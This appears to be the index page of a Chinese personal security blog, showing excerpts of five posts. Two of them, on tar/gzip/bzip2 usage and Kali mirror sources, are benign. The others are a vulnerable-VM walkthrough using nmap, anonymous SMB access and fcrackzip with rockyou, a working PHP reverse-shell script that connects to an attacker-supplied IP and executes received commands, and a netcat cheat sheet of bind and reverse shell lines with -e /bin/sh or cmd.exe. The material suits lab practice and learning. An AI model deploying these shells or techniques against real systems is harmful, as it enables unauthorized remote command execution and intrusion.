2020-3-10 myluzh
NOTE
tar(注:tar是打包,不是压缩!)
解包:tar xvf FileName.tar
打包:tar cvf FileName.tar DirName
.gz
解压1:gunzip FileName.gz
解压2:gzip -d FileName.gz
压缩:gzip FileName
.tar.gz
解压:tar zxvf FileName.tar.gz
压缩:tar zcvf FileName.tar.gz DirName
.bz2
解压1:bzip2 -d FileName.bz2
解压2:bunzip2 FileName.bz2
压缩: bzip2 -z FileName
.tar.bz2
解压:tar jxvf FileName.tar.bz2
压缩:tar jcvf FileName.tar.bz2 DirName
.bz
解压1:bzip2 -d FileName.bz
解压2:bunzip2 FileName.bz
.tar.bz
解压:tar jxvf FileName.tar.bz
.Z
解压:uncompress FileName.Z
压缩...
阅读全文>>
标签: kali linux 解压 压缩 zip tar tar.gz tar.bz2
评论(0)
(732)
2020-3-10 myluzh
SECURE
0x01 初步探测
靶机导入虚拟机后,先找到靶机IP,使用netdiscover命令扫描即可。扫到靶机ip192.168.56.101
nmap扫了下靶机开放的端口
0x02 访问网站
那就先从80端口开始下手,访问站点看看有什么内容,主页如下
随后就是dirb扫了下目录,没有什么能利用的东西,然后看了下主页源代码,看到源代码,里面有个提示 #GET#smb#free ,应该是提示我们利用smb。
0x03 步入smb
这边没有思路了,查了下writeup,smbclient语法如下;用户名为smb,密码为空,成功进入
smbclient//ip/myshare -U xxxx
查看了下当前目录文件,main.txt跟safe.zip
get命令下载文件
0x04 压缩包爆破
查看main.txt没东西能利用,解压safe.zip发现需要密码,利用fcrackzip进行爆破
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safezip
密码为hacker1,解压后得到文件secret.jpg,user...
阅读全文>>
评论(0)
(1345)
2020-3-6 myluzh
PHP
需要传递ip跟port两个参数,ip为攻击机的ip,port为自定义端口
<?php
set_time_limit(0);
$ip=$_GET['ip']
$port=$_GET['port'];
if ($ip == "" and $port == "") {
echo "[ip] [port] not defined";
exit();
}
$fp = @fsockopen($ip, $port, $errno, $errstr);
if (!$fp) {
echo "connection timed out";
} else {
fputs($fp, "\n++++++++++connect success++++++++\n");
while (!feof($fp)) {
fputs($fp, "shell:"); //输出
$shell = fgets($fp);
$message = `$shell`;
fputs($fp, $message);
}
...
阅读全文>>
标签: php 反弹 shell
评论(0)
(983)
2020-3-6 myluzh
NOTE
0x01基础使用
靶机创建一个服务端:
nc -nvlp [端口]
攻击机开启监听:
nc [服务端IP] [端口]
0x02获取shell
正向shell
靶机创建一个服务端:
#Windows
nc -nvlp [端口] -e cmd.exe
#Linux
nc -nvlp [端口] -e /bin/sh
攻击机开启监听:
nc [服务端IP] [端口]
反向shell
靶机创建一个服务端:
#Windows
nc [攻击机IP] [端口] -e cmd.exe
#Linux
nc [攻击机IP] [端口] -e /bin/sh
攻击机开启监听:
nc -nvlp [端口]
有些时候靶机上并没有nc,所以需要php反弹shell来实现,关于php反弹shell脚本
0x03文件传输
靶机创建一个服务端:
nc -nvlp [端口] >1.txt
攻击机接受文件:
nc [服务端IP] [端口] <1.txt
参考资料:
Netcat下载地址:https://eternallybored.org/misc/netcat/
“瑞士军刀”N...
阅读全文>>
评论(0)
(1026)
2020-3-6 myluzh
NOTE
0x01编辑kali的更新源地址文件
sudo vim /etc/apt/sources.list
0x02添加下面的源地址(选择几个增加即可)
#中科大
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
#阿里云
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
#清华大学
deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-r...
阅读全文>>
标签: kali linux 更新源
评论(0)
(852)